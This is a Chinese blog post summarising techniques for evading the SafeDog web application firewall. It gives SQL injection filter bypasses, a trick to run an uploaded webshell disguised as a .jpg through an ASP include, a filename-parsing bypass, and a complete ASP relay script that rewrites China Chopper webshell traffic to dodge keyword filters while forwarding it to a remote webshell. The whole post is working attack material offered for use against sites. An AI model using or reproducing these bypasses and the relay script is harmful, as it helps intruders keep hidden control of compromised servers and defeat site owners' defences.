过安全狗技术总汇

作者鬼哥

1.过注入
2.过大马被阻拦访问
3.过菜刀连接一句话被拦截
4.过1.asp;.jpg这样的文件
其他我没遇到了。。

现在一点一点讲:
1.过注入
方法一:a.asp?aaa=%00&id=sql语句
方法二: a.asp?id=sql语句   里面把安全过滤的加个%l 比如: un%aion sel%aect 1,2,3,4 fr%aom admin

2.过大马被阻拦访问
方法一:上传一个大马 然后访问http://sss.com/dama.asp  访问后出现拦截。
那么解决方法 先将dama.asp改名dama.jpg上传,然后在同目录上传个文件da.asp 内容为: <!–#include file=”dama.jpg” –>  这样再访问da.asp  就不会被拦截了。

3.过菜刀连接一句话被拦截
方法一:不用菜刀连接一句话,用别的一句话连接端。
方法二:中转下连接菜刀,把过滤掉的词替换掉。

4.过1.asp;.jpg这样的文件拦截
方法一:;1.asp;.jpg
方法二:保密

具体就为大家总结这么多了,安全狗 反正基本可以无视了!!
大家还有什么要补充的可以发在下面!

下面这个脚本是过安全狗连接菜刀用的 用法: 先把这个脚本放到个可执行.asp的目录
然后访问http://www.xx.com/asf.asp?dz=你要过的那个webshell地址
然后把地址输入进菜刀 密码还是你要过的那个webshell的密码 类型也是选择那个一句话木马的后缀类型
例如:http://www.xx.com/asf.asp?dz=http://xxx.com/yijuhua.php 密码
这样输入就菜刀
这个脚本暂时支持.php .aspx的一句话连接  .asp的可能还不行 没测试过。如果谁有装了安全狗的webshell可以告诉我下。我再测试下把这个脚本修改全面都支持!

1 <%
2     '饶过的原理,抓菜刀连接webshell的包 然后研究安全狗过滤了哪些关键字 中转替换掉那些过滤的关键字 就成!
3     JmStr=Replace(Request.Form,"$_POST","$_REQUEST")
4     JmStr=Replace(JmStr,"->|","-->|")
5     JmStr=Replace(JmStr,"@eval(","@eval   (")
6     JmStr=Replace(JmStr,"System.Convert.FromBase64String","System.Convert. FromBase64String")
7     JMUrl=request("dz")
8     response.write  request("dz")
9     JmRef=JMUrl
10     JmCok=""
11     response.write  PostData(JMUrl,JmStr,JmCok,JmRef)
12     Function PostData(PostUrl,PostStr,PostCok,PostRef)
13     Dim Http
14     Set Http = Server.CreateObject("msxml2.serverXMLHTTP")
15     With Http
16     .Open "POST",PostUrl,False
17     .SetRequestHeader "Content-Length",Len(PostStr)
18     .SetRequestHeader "Content-Type","application/x-www-form-urlencoded"
19     .SetRequestHeader "Referer",PostRef
20     '.SetRequestHeader "Cookie",PostCok
21     .Send PostStr
22     PostData = .ResponseBody
23     End With
24     Set Http = Nothing
25     PostData =bytes2BSTR(PostData)
26     End Function
27  
28     Function bytes2BSTR(vIn)
29     Dim strReturn
30     Dim I, ThisCharCode, NextCharCode
31     strReturn = ""
32     For I = 1 To LenB(vIn)
33     ThisCharCode = AscB(MidB(vIn, I, 1))
34     If ThisCharCode < &H80 Then
35     strReturn = strReturn & Chr(ThisCharCode)
36     Else
37     NextCharCode = AscB(MidB(vIn, I + 1, 1))
38     strReturn = strReturn & Chr(CLng(ThisCharCode) * &H100 + CInt(NextCharCode))
39     I = I + 1
40     End If
41     Next
42     bytes2BSTR = strReturn
43     End Function
44  
45     Function URLEncoding(vstrin)
46     strReturn=""
47     Dim i
48     For i=1 To Len(vstrin)
49     ThisChr=Mid(vstrin,i,1)
50     if Abs(Asc(ThisChr))< &HFF Then
51     strReturn=strReturn & ThisChr
52     Else
53     InnerCode=Asc(ThisChr)
54     If InnerCode<0 Then
55     InnerCode=InnerCode + &H10000
56     End If
57     Hight1=(InnerCode And &HFF00) \&HFF
58     Low1=InnerCode And &HFF
59     strReturn=strReturn & "%" & Hex(Hight1) & "%" & Hex(Low1)
60     End if
61     Next
62     strReturn=Replace(strReturn,chr(32),"%20") '转换空格,如果网站过滤了空格,尝试用/**/来代替%20
63     strReturn=Replace(strReturn,chr(43),"%2B")  'J6156增加转换+字符
64     'strReturn=Replace(strReturn,过滤字符,"转换为字符")  '在此增加要过滤的代码
65     URLEncoding=strReturn
66     End Function
67  
68     %>
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值